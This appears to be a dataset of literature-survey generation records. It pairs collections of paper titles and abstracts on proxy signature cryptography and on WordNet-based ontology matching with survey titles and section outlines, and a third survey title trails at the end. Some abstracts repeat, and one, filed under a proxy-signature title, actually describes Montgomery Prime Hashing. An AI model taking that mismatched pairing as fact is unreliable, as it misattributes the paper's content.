provable security has been proposed. In this paper, we formalize a notion of security for ID-based proxy signature schemes and propose a scheme based on the bilinear pairings. We show that the security of our scheme is tightly related to the computational Diffie-Hellman assumption in the random oracle model. --- paper_title: Verifiable Secret Sharing for General Access Structures, with Application to Fully Distributed Proxy Signatures paper_content: Secret sharing schemes are an essential part of distributed cryptographic systems. When dishonest participants are considered, then an appropriate tool are verifiable secret sharing schemes. Such schemes have been traditionally considered for a threshold scenario, in which all the participants play an equivalent role. In this work, we generalize some protocols dealing with verifiable secret sharing, in such a way that they run in a general distributed scenario for both the tolerated subsets of dishonest players and the subsets of honest players authorized to execute the different phases of the protocols. --- paper_title: Proxy and threshold one-time signatures paper_content: One-time signatures are an important and efficient authentication utility. Various schemes already exist for the classical one-way public-key cryptography. One-time signatures have not been sufficiently explored in the literature in the branch of society-oriented cryptography. Their particular properties make them suitable, as a potential cryptographic primitive, for broadcast communication and group-based applications. In this paper, we try to contribute to filling this gap by introducing several group-based one-time signature schemes of various versions: with proxy, with trusted party, and without trusted party. --- paper_title: Provably secure delegation-by-certification proxy signature schemes paper_content: In this paper, we first show that a previous proxy signature scheme by delegation with certificate is not provably secure under adaptive-chosen message attacks and adaptive-chosen warrant attacks. The scheme does not provide the strong undeniability. Then we construct a proxy signature scheme by delegation with certificate based on Co-GDH group from bilinear map. Our proxy signature scheme is existentially unforgeable against adaptive-chosen message attacks and adaptive-chosen warrant attacks in random oracle model. We adopt a straight method of security reduction in which our scheme's security is reduced to hardness of the computational co-Diffie-Hellem problem. The proposed signature scheme is the first secure delegation-by-certificate proxy signature based on co-GDH groups from bilinear maps under the formal security model in random oracle model. --- paper_title: Efficient signature generation by smart cards paper_content: We present a new public-key signature scheme and a corresponding authentication scheme that are based on discrete logarithms in a subgroup of units in ? p where p is a sufficiently large prime, e.g., p ? 2512. A key idea is to use for the base of the discrete logarithm an integer ? in ? p such that the order of ? is a sufficiently large prime q, e.g., q ? 2140. In this way we improve the ElGamal signature scheme in the speed of the procedures for the generation and the verification of signatures and also in the bit length of signatures. We present an efficient algorithm that preprocesses the exponentiation of a random residue modulo p. --- paper_title: Handbook of Applied Cryptography paper_content: From the Publisher: ::: A valuable reference for the novice as well as for the expert who needs a wider scope of coverage within the area of cryptography, this book provides easy and rapid access of information and includes more than 200 algorithms and protocols; more than 200 tables and figures; more than 1,000 numbered definitions, facts, examples, notes, and remarks; and over 1,250 significant references, including brief comments on each paper. --- paper_title: A forward-secure public-key encryption scheme paper_content: Cryptographic computations are often carried out on insecure devices for which the threat of key exposure represents a serious and realistic concern. In an effort to mitigate the damage caused by exposure of secret data (e.g., keys) stored on such devices, the paradigm of forward security was introduced. In a forward-secure scheme, secret keys are updated at regular periods of time; furthermore, exposure of a secret key corresponding to a given time period does not enable an adversary to "break" the scheme (in the appropriate sense) for any prior time period. A number of constructions of forward-secure digital signature schemes, key-exchange protocols, and symmetric-key schemes are known. ::: ::: We present the first constructions of a (non-interactive) forward-secure public-key encryption scheme. Our main construction achieves security against chosen plaintext attacks under the decisional bilinear Diffie-Hellman assumption in the standard model. It is practical, and all complexity parameters grow at most logarithmically with the total number of time periods. The scheme can also be extended to achieve security against chosen ciphertext attacks. --- paper_title: New Directions in Cryptography paper_content: Two kinds of contemporary developments in cryptography are examined. Widening applications of teleprocessing have given rise to a need for new types of cryptographic systems, which minimize the need for secure key distribution channels and supply the equivalent of a written signature. This paper suggests ways to solve these currently open problems. It also discusses how the theories of communication and computation are beginning to provide the tools to solve cryptographic problems of long standing. --- paper_title: A digital signature scheme secure against adaptive chosen-message attacks paper_content: We present a digital signature scheme based on the computational difficulty of integer factorization.The scheme possesses the novel property of being robust against an adaptive chosen-message attack: an adversary who receives signatures for messages of his choice (where each message may be chosen in a way that depends on the signatures of previously chosen messages) cannot later forge the signature of even a single additional message. This may be somewhat surprising, since in the folklore the properties of having forgery being equivalent to factoring and being invulnerable to an adaptive chosen-message attack were considered to be contradictory.More generally, we show how to construct a signature scheme with such properties based on the existence of a “claw-free” pair of permutations—a potentially weaker assumption than the intractibility of integer factorization.The new scheme is potentially practical: signing and verifying signatures are reasonably fast, and signatures are compact. --- paper_title: Reducing elliptic curve logarithms to logarithms in a finite field paper_content: Elliptic curve cryptosystems have the potential to provide relatively small block size, high-security public key schemes that can be efficiently implemented. As with other known public key schemes, such as RSA and discrete exponentiation in a finite field, some care must be exercised when selecting the parameters involved, in this case the elliptic curve and the underlying field. Specific classes of curves that give little or no advantage over previously known schemes are discussed. The main result of the paper is to demonstrate the reduction of the elliptic curve logarithm problem to the logarithm problem in the multiplicative group of an extension of the underlying finite field. For the class of supersingular elliptic curves, the reduction takes probabilistic polynomial time, thus providing a probabilistic subexponential time algorithm for the former problem. > --- paper_title: Short Signatures from the Weil Pairing paper_content: We introduce a short signature scheme based on the Computational Diffie–Hellman assumption on certain elliptic and hyperelliptic curves. For standard security parameters, the signature length is about half that of a DSA signature with a similar level of security. Our short signature scheme is designed for systems where signatures are typed in by a human or are sent over a low-bandwidth channel. We survey a number of properties of our signature scheme such as signature aggregation and batch verification. --- paper_title: A Remark Concerning m-Divisibility and the Discrete Logarithm in the Divisor Class Group of Curves paper_content: The aim of this paper is to show that the computation of the discrete logarithm in the m-torsion part of the divisor class group of a curve X over a finite field ko (with char(ko) prime to m), or over a local field k with residue field ko, can be reduced to the computation of the discrete logarithm in k0(4m)* . For this purpose we use a variant of the (tame) Tate pairing for Abelian varieties over local fields. In the same way the problem to determine all linear combinations of a finite set of elements in the divisor class group of a curve over k or ko which are divisible by m is reduced to the computation of the discrete logarithm in ko(Cm)* - --- paper_title: Identity-based encryption from the Weil pairing paper_content: We propose a fully functional identity-based encryption (IBE) scheme. The scheme has chosen ciphertext security in the random oracle model assuming a variant of the computational Diffie--Hellman problem. Our system is based on bilinear maps between groups. The Weil pairing on elliptic curves is an example of such a map. We give precise definitions for secure IBE schemes and give several applications for such systems. --- paper_title: An Identity Based Encryption Scheme Based on Quadratic Residues paper_content: We present a novel public key cryptosystem in which the public key of a subscriber can be chosen to be a publicly known value, such as his identity. We discuss the security of the proposed scheme, and show that this is related to the difficulty of solving the quadratic residuosity problem. --- paper_title: A method for obtaining digital signatures and public-key cryptosystems paper_content: An encryption method is presented with the novel property that publicly revealing an encryption key does not thereby reveal the corresponding decryption key. This has two important consequences: (1) Couriers or other secure means are not needed to transmit keys, since a message can be enciphered using an encryption key publicly revealed by the intented recipient. Only he can decipher the message, since only he knows the corresponding decryption key. (2) A message can be “signed” using a privately held decryption key. Anyone can verify this signature using the corresponding publicly revealed encryption key. Signatures cannot be forged, and a signer cannot later deny the validity of his signature. This has obvious applications in “electronic mail” and “electronic funds transfer” systems. A message is encrypted by representing it as a number M, raising M to a publicly specified power e, and then taking the remainder when the result is divided by the publicly specified product, n , of two large secret primer numbers p and q. Decryption is similar; only a different, secret, power d is used, where e * d ≡ 1(mod (p - 1) * (q - 1)). The security of the system rests in part on the difficulty of factoring the published divisor, n . --- paper_title: Threshold proxy signatures paper_content: A (t, n) threshold proxy signature scheme allows t or more proxy signers from a designated group of n proxy signers to sign messages on behalf of an original signer. The authors review both Zhang's threshold proxy signature scheme and Kim's threshold proxy signature scheme. They show that Zhang's scheme suffers from some weaknesses and Kim's scheme suffers from a disadvantage. Based on Zhang's scheme, they propose a new threshold proxy signature scheme to defeat the weaknesses of Zhang's scheme and the disadvantage of Kim's scheme. --- paper_title: Repudiation of Cheating and Non-repudiation of Zhang's Proxy Signature Schemes paper_content: The paper discusses the correctness of Lee, Hwang and Wang's comments on on Zhang's proxy signature schemes. In particular, it is shown that the cheating attack proposed by Lee, Hwang and Wang can be detected by the owner of the signature scheme. It is argued that considering the context in which proxy signatures are used, the attack is not a security problem. The work is concluded by a discussion about the non-repudiation controversy incorrectly observed by Lee, Hwang and Wang. --- paper_title: Robust threshold DSS signatures paper_content: We present threshold DSS (Digital Signature Standard) signatures where the power to sign is shared by n players such that for a given parameter t < n/2 any subset of 2t + 1 signers can collaborate to produce a valid DSS signature on any given message, but no subset of t corrupted players can forge a signature (in particular, cannot learn the signature key). In addition, we present a robust threshold DSS scheme that can also tolerate n/3 players who refuse to participate in the signature protocol. We can also endure n/4 maliciously faulty players that generate incorrect partial signatures at the time of signature computation. This results in a highly secure and resilient DSS signature system applicable to the protection of the secret signature key, the prevention of forgery, and increased system availability. ::: ::: Our results significantly improve over a recent result by Langford from CRYPTO'95 that presents threshold DSS signatures which can stand much smaller subsets of corrupted players, namely, t ≅ √n, and do not enjoy the robustness property. As in thc case of Langford's result, our schemes require no trusted party. Our techniques apply to other threshold ElGamal-like signatures as well. We prove the security of our schemes solely based on the hardness of forging a regular DSS signature. --- paper_title: Threshold proxy signatures paper_content: A (t, n) threshold proxy signature scheme allows t or more proxy signers from a designated group of n proxy signers to sign messages on behalf of an original signer. The authors review both Zhang's threshold proxy signature scheme and Kim's threshold proxy signature scheme. They show that Zhang's scheme suffers from some weaknesses and Kim's scheme suffers from a disadvantage. Based on Zhang's scheme, they propose a new threshold proxy signature scheme to defeat the weaknesses of Zhang's scheme and the disadvantage of Kim's scheme. --- paper_title: Threshold Proxy Signature Schemes paper_content: Delegation of rights is a common practice in the real world. Proxy signature schemes have been invented to delegate signing capability efficiently and transparently. In this paper, we present a new nonrepudiable proxy signature scheme. Nonrepudiation means the signature signers, both original and proxy signers, cannot falsely deny later that he generated a signature. In practice, it is important and, sometimes, necessary to have the ability to know who is the actual signer of a proxy signature for internal auditing purpose or when there is abuse of signing capability. The new nonrepudiable proxy signature scheme also has other desirable properties, such as proxy signature key generation and updating using insecure channels. We also show how to construct threshold proxy signature schemes with an example. Threshold signatures are motivated both by the need that arises in some organizations to have a group of employees agree on a given message (or a document) before signing it, as well as by the need to protect signature keys from the attack of internal and external adversaries. Our approach can also be applied to other ElGamal-like proxy signature schemes. --- paper_title: On Zhang's Nonrepudiable Proxy Signature Schemes paper_content: In 1997, Zhang proposed two new nonrepudiable proxy signature schemes to delegate signing capability. Both schemes claimed to have a property of knowing that a proxy signature is generated by either the original signer or a proxy signer. However, this paper will show that Zhang's second scheme fails to possess this property. Moreover, we shall show that the proxy signer can cheat to get the original signer's signature, if Zhang's scheme is based on some variants of ElGamal-type signature schemes. We modify Zhang's nonrepudiable proxy signature scheme to avoid the above attacks. The modified scheme also investigates a new feature for the original signer to limit the delegation time to a certain period. --- paper_title: An analysis of proxy signatures: is a secure channel necessary? paper_content: Montgomery Prime Hashing (MPH) is a scheme for message authentication based on universal hashing.I n MPH, roughly speaking, the hash value is computed as the Montgomery residue of the message with respect to a secret modulus.The modulus value is structured in a way that allows fast, compact implementations in both hardware and software.The set of allowed modulus values is large, and as a result, MPH achieves good, provable security. ::: ::: MPH performance is comparable to that of other high-speed schemes such as MMH. An advantage of MPH is that the secret key (i.e., the modulus) is small, typically 128-256 bits, while in MMH the secret key is typically much larger.I n applications where MMH key length is problematic, MPH may be an attractive alternative. --- paper_title: Distributed provers with applications to undeniable signatures paper_content: This paper introduces distributed prover protocols. Such a protocol is a proof system in which a polynomially bounded prover is replaced by many provers each having partial information about the witness owned by the original prover. As an application of this concept, it is shown how the signer of undeniable signatures can distribute part of his secret key to n agents such that any k of these can verify a signature. This facility is useful in most applications of undeniable signatures, and as the proposed protocols are practical, the results in this paper makes undeniable signatures more useful. The first part of the paper describes a method for verifiable secret sharing, which allows non-interactive verification of the shares and is as secure as the Shamir secret sharing scheme in the proposed applications. --- paper_title: Improvement of threshold proxy signature scheme paper_content: Abstract A (t, n) threshold proxy signature scheme allows any t or more proxy signers to cooperatively sign messages on behalf of an original signer, but t−1 or fewer proxy signers cannot. Sun et al. proposed a new (t, n) threshold proxy signature scheme based on Zhang's threshold proxy signature scheme. Recently, Hsu et al. pointed out that Sun's scheme suffered from a drawback and proposed an improvement to counter it. However, the author of this paper shows that both Sun's scheme and Hsu's improvement are not secure against coalition attack. Some t or more malicious proxy signers can conspire together against the original signer. Finally, we propose a new improvement to counter this attack, the proxy generation and the signature computation of which is more efficient than those of Sun's scheme and Hsu's improvement. The main advantage of the new improvement is traceability, by which the original signer can identify the actual signers that are anonymous to outsiders. --- paper_title: Threshold Proxy Signature Schemes paper_content: Delegation of rights is a common practice in the real world. Proxy signature schemes have been invented to delegate signing capability efficiently and transparently. In this paper, we present a new nonrepudiable proxy signature scheme. Nonrepudiation means the signature signers, both original and proxy signers, cannot falsely deny later that he generated a signature. In practice, it is important and, sometimes, necessary to have the ability to know who is the actual signer of a proxy signature for internal auditing purpose or when there is abuse of signing capability. The new nonrepudiable proxy signature scheme also has other desirable properties, such as proxy signature key generation and updating using insecure channels. We also show how to construct threshold proxy signature schemes with an example. Threshold signatures are motivated both by the need that arises in some organizations to have a group of employees agree on a given message (or a document) before signing it, as well as by the need to protect signature keys from the attack of internal and external adversaries. Our approach can also be applied to other ElGamal-like proxy signature schemes. --- paper_title: Security Analysis of Some Proxy Signatures paper_content: A proxy signature scheme allows an entity to delegate his/her signing capability to another entity in such a way that the latter can sign messages on behalf of the former. Such schemes have been suggested for use in a number of applications, particularly in distributed computing where delegation of rights is quite common. Followed by the first schemes introduced by Mambo, Usuda and Okamoto in 1996, a number of new schemes and improvements have been proposed. In this paper, we present a security analysis of four such schemes newly proposed in [14, 15]. By successfully identifying several interesting forgery attacks, we show that these four schemes -all are insecure. Consequently, the fully distributed proxy scheme in [11] is also insecure since it is based on the (insecure) LKK scheme [13, 14]. In addition, we point out the reasons why the security proofs provided in [14] are invalid. --- paper_title: Security Analysis of Some Proxy Signatures paper_content: A proxy signature scheme allows an entity to delegate his/her signing capability to another entity in such a way that the latter can sign messages on behalf of the former. Such schemes have been suggested for use in a number of applications, particularly in distributed computing where delegation of rights is quite common. Followed by the first schemes introduced by Mambo, Usuda and Okamoto in 1996, a number of new schemes and improvements have been proposed. In this paper, we present a security analysis of four such schemes newly proposed in [14, 15]. By successfully identifying several interesting forgery attacks, we show that these four schemes -all are insecure. Consequently, the fully distributed proxy scheme in [11] is also insecure since it is based on the (insecure) LKK scheme [13, 14]. In addition, we point out the reasons why the security proofs provided in [14] are invalid. --- paper_title: Proxy signatures, Revisited paper_content: Proxy signatures, introduced by Mambo, Usuda and Okamoto allow a designated person to sign on behalf of an original signer. This paper first presents two new types of digital proxy signatures called partial delegation with warrant and threshold delegation. Proxy signatures for partial delegation with warrant combines the benefit of Mambo's partial delegation and Neuman's delegation by warrant, and then in threshold delegation the proxy signer's power to sign messages is shared. Moreover, we also propose straightforward and concrete proxy signature schemes satisfying our conditions. --- paper_title: Proxy signatures, Revisited paper_content: Proxy signatures, introduced by Mambo, Usuda and Okamoto allow a designated person to sign on behalf of an original signer. This paper first presents two new types of digital proxy signatures called partial delegation with warrant and threshold delegation. Proxy signatures for partial delegation with warrant combines the benefit of Mambo's partial delegation and Neuman's delegation by warrant, and then in threshold delegation the proxy signer's power to sign messages is shared. Moreover, we also propose straightforward and concrete proxy signature schemes satisfying our conditions. --- paper_title: Proxy and threshold one-time signatures paper_content: One-time signatures are an important and efficient authentication utility. Various schemes already exist for the classical one-way public-key cryptography. One-time signatures have not been sufficiently explored in the literature in the branch of society-oriented cryptography. Their particular properties make them suitable, as a potential cryptographic primitive, for broadcast communication and group-based applications. In this paper, we try to contribute to filling this gap by introducing several group-based one-time signature schemes of various versions: with proxy, with trusted party, and without trusted party. --- paper_title: New Proxy Signature, Proxy Blind Signature and Proxy Ring Signature Schemes from Bilinear Pairings paper_content: Proxy signatures are very useful tools when one needs to delegate his/her signing capability to other party. After Mambo et al.’s first scheme was announced, many proxy signature schemes and various types of proxy signature schemes have been proposed. Due to the various applications of the bilinear pairings in cryptography, there are many IDbased signature schemes have been proposed. In this paper, we address that it is easy to design proxy signature and proxy blind signature from the conventional ID-based signature schemes using bilinear pairings, and give some concrete schemes based on existed ID-based signature schemes. At the same time, we introduce a new type of proxy signature – proxy ring signature, and propose the first proxy ring signature scheme based on an existed ID-based ring signature scheme. --- paper_title: A Paradoxical Indentity-Based Signature Scheme Resulting from Zero-Knowledge paper_content: At EUROCRYPT'88, we introduced an interactive zero-knowledge protocol (Guillou and Quisquater [13]) fitted to the authentication of tamper-resistant devices (e.g. smart cards, Guillou and Ugon [14]).Each security device stores its secret authentication number, an RSA-like signature computed by an authority from the device identity. Any transaction between a tamper-resistant security device and a verifier is limited to a unique interaction: the device sends its identity and a random test number, then the verifier tells a random large question; and finally the device answers by a witness number. The transaction is successful when the test number is reconstructed from the witness number, the question and the identity according to numbers published by the authority and rules of redundancy possibly standardized.This protocol allows a cooperation between users in such a way that a group of cooperative users looks like a new entity, having a shadowed identity the product of the individual shadowed identities, while each member reveals nothing about its secret.In another scenario, the secret is partitioned between distinct devices sharing the same identity. A group of cooperative users looks like a unique user having a larger public exponent which is the greater common multiple of each individual exponent.In this paper, additional features are introduced in order to provide: firstly, a mutual interactive authentication of both communicating entities and previously exchanged messages, and, secondly, a digital signature of messages, with a non-interactive zero-knowledge protocol. The problem of multiple signature is solved here in a very smart way due to the possibilities of cooperation between users.The only secret key is the factors of the composite number chosen by the authority delivering one authentication number to each smart card. This key is not known by the user. At the user level, such a scheme may be considered as a keyless identity-based integrity scheme. This integrity has anew and important property: it cannot be misused, i.e. derived into a confidentiality scheme. --- paper_title: Efficient proxy multisignature schemes based on the elliptic curve cryptosystem paper_content: For improving proxy-signature research, Sun [5] attempted to resolve problems related to defective security in the scheme of Yi [3]. However, both Yi and Sun's schemes involve a significant number of exponential operations to verify the proxy signature. Accordingly, an improvement is proposed here to change the exponential operations into elliptic curve multiplicative ones. As proposed by both Koblitz [6-7] and Miller [8] in 1985, the elliptic curve is used in developing the cryptosystems. The elliptic curve cryptosystem can achieve a level of security equal to that of RSA or DSA but has a lower computational overhead and a smaller key size than both of these. Therefore, it is used in Sun's schemes to improve their efficiency. --- paper_title: Design of time-stamped proxy signatures with traceable receivers paper_content: A proxy signature scheme is a method which allows an original signer to delegate his signing power to a proxy signer. Most proxy signature schemes use a warrant appearing in the signature verification equation to declare the valid delegation period. However, the declaration in the warrant is useless because no-one can know the exact time when the proxy signer signed a message. To avoid the proxy signer abusing the signing capability, the original signer may hope to know the identity of who received the proxy signature from the proxy signer. Recently Sun and Chen proposed the concept of time-stamped proxy signatures with traceable receivers to solve these two problems. A time-stamped proxy signature scheme with traceable receivers is a proxy signature scheme which can ascertain whether a proxy signature is created during the delegation period, and can trace who actually received the proxy signatures from the proxy signer. The author shows that Sun and Chen's scheme suffers from weaknesses and consequently proposes a new time-stamped proxy signature scheme which doesn't suffer from the same weaknesses. ---
Title: Algorithms and Approaches of Proxy Signature: A Survey Section 1: Introduction Description 1: Provide an introduction to digital signatures, evolution of proxy signatures, and various types of delegations in proxy signatures. Section 2: Discrete Logarithm Problem Description 2: Discuss the discrete logarithm problem, its relevance in cryptography, and its application in signature schemes like Schnorr's signature scheme. Section 3: Bilinear Pairings Description 3: Explain bilinear pairings, their properties, computational problems related to them, and their use in cryptographic protocols like Hess's signature scheme. Section 4: Integer Factorization Problem Description 4: Describe the integer factorization problem, its significance in cryptography, and details of RSA-based signature schemes. Section 5: Security Properties of a Proxy Signature Description 5: Outline the desirable security properties that proxy signatures must possess, such as strong unforgeability, identifiability, undeniability, verifiability, distinguishability, secrecy, and prevention of misuse. Section 6: Classification of Proxy Signature Description 6: Classify proxy signatures based on the nature of delegation capability into proxy-unprotected, proxy-protected, and threshold notions. Section 7: Models of Proxy Signature Description 7: Categorize existing proxy signature schemes based on their security assumptions into DLP-based, RSA-based, and pairing-based models. Section 8: DLP-based Proxy Signature Description 8: Review proxy signatures where the security relies on the discrete logarithm problem, detailing their procedures and security. Section 9: RSA-based Proxy Signature Description 9: Discuss proxy signatures that depend on the RSA algorithm, outlining their key generation, delegation capability, and signature verification processes. Section 10: ECDSA-based Proxy Signature Description 10: Explore proxy signatures based on the elliptic curve digital signature algorithm, addressing the reduction of computational overheads and multi-signature schemes. Section 11: Pairing-based Proxy Signature Description 11: Examine proxy signatures utilizing bilinear pairings, detailing the generation and verification of proxy signatures and addressing their security concerns. Section 12: Notable Proxy Signature Schemes Description 12: Review contributions from various researchers, highlight notable proxy signature schemes, and discuss their strengths and weaknesses. Section 13: Conclusion Description 13: Summarize the survey, present the overall observations, and suggest potential areas for future research in proxy signature schemes.
A Survey of Exploiting WordNet in Ontology Matching
8
--- paper_title: Using Corpus Statistics And WordNet Relations For Sense Identification paper_content: Corpus-based approaches to word sense identification have flexibility and generality but suffer from a knowledge acquisition bottleneck. We show how knowledge-based techniques can be used to open the bottleneck by automatically locating training corpora. We describe a statistical classifier that combines topical context with local cues to identify a word sense. The classifier is used to disambiguate a noun, a verb, and an adjective. A knowledge base in the form of WordNet's lexical relations is used to automatically locate training examples in a general text corpus. Test results are compared with those from manually tagged training examples. --- paper_title: Determining Semantic Similarity among Entity Classes from Different Ontologies paper_content: Semantic similarity measures play an important role in information retrieval and information integration. Traditional approaches to modeling semantic similarity compute the semantic distance between definitions within a single ontology. This single ontology is either a domain-independent ontology or the result of the integration of existing ontologies. We present an approach to computing semantic similarity that relaxes the requirement of a single ontology and accounts for differences in the levels of explicitness and formalization of the different ontology specifications. A similarity function determines similar entity classes by using a matching process over synonym sets, semantic neighborhoods, and distinguishing features that are classified into parts, functions, and attributes. Experimental results with different ontologies indicate that the model gives good results when ontologies have complete and detailed representations of entity classes. While the combination of word matching and semantic neighborhood matching is adequate for detecting equivalent entity classes, feature matching allows us to discriminate among similar, but not necessarily equivalent entity classes. --- paper_title: Semantic Similarity Based on Corpus Statistics and Lexical Taxonomy paper_content: This paper presents a new approach for measuring semantic similarity/distance between words and concepts. It combines a lexical taxonomy structure with corpus statistical information so that the semantic distance between nodes in the semantic space constructed by the taxonomy can be better quantified with the computational evidence derived from a distributional analysis of corpus data. Specifically, the proposed measure is a combined approach that inherits the edge-based approach of the edge counting scheme, which is then enhanced by the node-based approach of the information content calculation. When tested on a common data set of word pair similarity ratings, the proposed approach outperforms other computational models. It gives the highest correlation value (r = 0.828) with a benchmark based on human similarity judgements, whereas an upper bound (r = 0.885) is observed when human subjects replicate the same task. --- paper_title: Semantic Enrichment for Ontology Mapping paper_content: In this paper, we present a heuristic mapping method and a prototype mapping system that support the process of semi-automatic ontology mapping for the purpose of improving semantic interoperability in heterogeneous systems. The approach is based on the idea of semantic enrichment, i.e. using instance information of the ontology to enrich the original ontology and calculate similarities between concepts in two ontologies. The functional settings for the mapping system are discussed and the evaluation of the prototype implementation of the approach is reported. --- paper_title: Verb Semantics And Lexical Selection paper_content: This paper will focus on the semantic representation of verbs in computer systems and its impact on lexical selection problems in machine translation (MT). Two groups of English and Chinese verbs are examined to show that lexical selection must be based on interpretation of the sentences as well as selection restrictions placed on the verb arguments. A novel representation scheme is suggested, and is compared to representations with selection restrictions used in transfer-based MT. We see our approach as closely aligned with knowledge-based MT approaches (KBMT), and as a separate component that could be incorporated into existing systems. Examples and experimental results will show that, using this scheme, inexact matches can achieve correct lexical selection. --- paper_title: Using Information Content to Evaluate Semantic Similarity in a Taxonomy paper_content: This paper presents a new measure of semantic similarity in an IS-A taxonomy, based on the notion of information content. Experimental evaluation suggests that the measure performs encouragingly well (a correlation of r = 0.79 with a benchmark set of human similarity judgments, with an upper bound of r = 0.90 for human subjects performing the same task), and significantly better than the traditional edge counting approach (r = 0.66). --- paper_title: Semantic Similarity Based on Corpus Statistics and Lexical Taxonomy paper_content: This paper presents a new approach for measuring semantic similarity/distance between words and concepts. It combines a lexical taxonomy structure with corpus statistical information so that the semantic distance between nodes in the semantic space constructed by the taxonomy can be better quantified with the computational evidence derived from a distributional analysis of corpus data. Specifically, the proposed measure is a combined approach that inherits the edge-based approach of the edge counting scheme, which is then enhanced by the node-based approach of the information content calculation. When tested on a common data set of word pair similarity ratings, the proposed approach outperforms other computational models. It gives the highest correlation value (r = 0.828) with a benchmark based on human similarity judgements, whereas an upper bound (r = 0.885) is observed when human subjects replicate the same task. --- paper_title: Determining Semantic Similarity among Entity Classes from Different Ontologies paper_content: Semantic similarity measures play an important role in information retrieval and information integration. Traditional approaches to modeling semantic similarity compute the semantic distance between definitions within a single ontology. This single ontology is either a domain-independent ontology or the result of the integration of existing ontologies. We present an approach to computing semantic similarity that relaxes the requirement of a single ontology and accounts for differences in the levels of explicitness and formalization of the different ontology specifications. A similarity function determines similar entity classes by using a matching process over synonym sets, semantic neighborhoods, and distinguishing features that are classified into parts, functions, and attributes. Experimental results with different ontologies indicate that the model gives good results when ontologies have complete and detailed representations of entity classes. While the combination of word matching and semantic neighborhood matching is adequate for detecting equivalent entity classes, feature matching allows us to discriminate among similar, but not necessarily equivalent entity classes. --- paper_title: Using Corpus Statistics And WordNet Relations For Sense Identification paper_content: Corpus-based approaches to word sense identification have flexibility and generality but suffer from a knowledge acquisition bottleneck. We show how knowledge-based techniques can be used to open the bottleneck by automatically locating training corpora. We describe a statistical classifier that combines topical context with local cues to identify a word sense. The classifier is used to disambiguate a noun, a verb, and an adjective. A knowledge base in the form of WordNet's lexical relations is used to automatically locate training examples in a general text corpus. Test results are compared with those from manually tagged training examples. --- paper_title: Determining Semantic Similarity among Entity Classes from Different Ontologies paper_content: Semantic similarity measures play an important role in information retrieval and information integration. Traditional approaches to modeling semantic similarity compute the semantic distance between definitions within a single ontology. This single ontology is either a domain-independent ontology or the result of the integration of existing ontologies. We present an approach to computing semantic similarity that relaxes the requirement of a single ontology and accounts for differences in the levels of explicitness and formalization of the different ontology specifications. A similarity function determines similar entity classes by using a matching process over synonym sets, semantic neighborhoods, and distinguishing features that are classified into parts, functions, and attributes. Experimental results with different ontologies indicate that the model gives good results when ontologies have complete and detailed representations of entity classes. While the combination of word matching and semantic neighborhood matching is adequate for detecting equivalent entity classes, feature matching allows us to discriminate among similar, but not necessarily equivalent entity classes. --- paper_title: Finding Out About: A Cognitive Perspective on Search Engine Technology and the WWW paper_content: The World Wide Web is rapidly filling with more text than anyone could have imagined a short time ago. However, the task of determining which data is relevant has become appreciably harder. In this original new work Richard Belew brings a cognitive science perspective to the study of information as a computer science discipline. He introduces the idea of Finding Out About (FOA), the process of actively seeking out information relevant to a topic of interest. Belew describes all facets of FOA, ranging from creating a good characterization of what the user seeks to evaluating the successful performance of search engines. His volume clearly shows how to build many of the tools that are useful for searching collections of text and other media. While computer scientists make up the book's primary audience, Belew skillfully presents technical details in a manner that makes important themes accessible to readers more comfortable with words than equations. (A CD is included with the text.) --- paper_title: Semantic Enrichment for Ontology Mapping paper_content: In this paper, we present a heuristic mapping method and a prototype mapping system that support the process of semi-automatic ontology mapping for the purpose of improving semantic interoperability in heterogeneous systems. The approach is based on the idea of semantic enrichment, i.e. using instance information of the ontology to enrich the original ontology and calculate similarities between concepts in two ontologies. The functional settings for the mapping system are discussed and the evaluation of the prototype implementation of the approach is reported. --- paper_title: Investigating semantic similarity measures across the Gene Ontology: paper_content: Motivation: Many bioinformatics data resources not only hold data in the form of sequences, but also as annotation. In the majority of cases, annotation is written as scientific natural language: this is suitable for humans, but not particularly useful for machine processing. Ontologies offer a mechanism by which knowledge can be represented in a form capable of such processing. In this paper we investigate the use of ontological annotation to measure the similarities in knowledge content or ‘semantic similarity’ between entries in a data resource. These allow a bioinformatician to perform a similarity measure over annotation in an analogous manner to those performed over sequences. Am easure of semantic similarity for the knowledge component of bioinformatics resources should afford a biologist a new tool in their repetoire of analyses. Results: We present the results from experiments that investigate the validity of using semantic similarity by comparison with sequence similarity. We show a simple extension that enables a semantic search of the knowledge held within sequence databases. Availability: Software available from http://www.russet. --- paper_title: Semantic Similarity Based on Corpus Statistics and Lexical Taxonomy paper_content: This paper presents a new approach for measuring semantic similarity/distance between words and concepts. It combines a lexical taxonomy structure with corpus statistical information so that the semantic distance between nodes in the semantic space constructed by the taxonomy can be better quantified with the computational evidence derived from a distributional analysis of corpus data. Specifically, the proposed measure is a combined approach that inherits the edge-based approach of the edge counting scheme, which is then enhanced by the node-based approach of the information content calculation. When tested on a common data set of word pair similarity ratings, the proposed approach outperforms other computational models. It gives the highest correlation value (r = 0.828) with a benchmark based on human similarity judgements, whereas an upper bound (r = 0.885) is observed when human subjects replicate the same task. ---
Title: A Survey of Exploiting WordNet in Ontology Matching Section 1: Introduction Description 1: Provide an overview of the importance of ontologies in the Semantic Web and the need for ontology matching. Introduce the role of WordNet in enhancing similarity measures. Section 2: WordNet Description 2: Describe the structure and components of WordNet, including synsets and various semantic relationships. Discuss the multilingual extension EuroWordNet. Section 3: Exploiting WordNet in Ontology Matching Description 3: Outline the use of WordNet in calculating semantic similarity for ontology matching. Categorize methods into edge-based, information-based statistics, and hybrid methods. Section 4: Edge-based Methods Description 4: Detail various edge-based methods for calculating semantic similarity using WordNet. Include specific algorithms like those proposed by Wu and Palmer, Resnik, and others. Section 5: Information-based Statistics Methods Description 5: Explain information-based statistics methods for semantic similarity, including Resnik's approach and Lin's adaptation. Discuss their application in ontology matching. Section 6: Hybrid Methods Description 6: Discuss combined models that integrate edge-based and information-based approaches. Provide examples such as Jiang and Conrath's model, Rodriguez's approach, and others. Section 7: Applying WordNet Based Semantic Similarity Methods in Ontology Matching Description 7: Describe the preprocessing steps involved in applying WordNet based methods, such as tokenisation, stemming, and stop-word removal. Explain how semantic similarity methods are applied in practical ontology matching scenarios. Section 8: Conclusions Description 8: Summarize the different WordNet-based semantic similarity measures and their applications in ontology matching. Highlight the tools that implement these measures and their effectiveness.
Discovering New Worlds: A review of signal processing methods for detecting exoplanets from astronomical radial velocity data [Applications Corner]
10
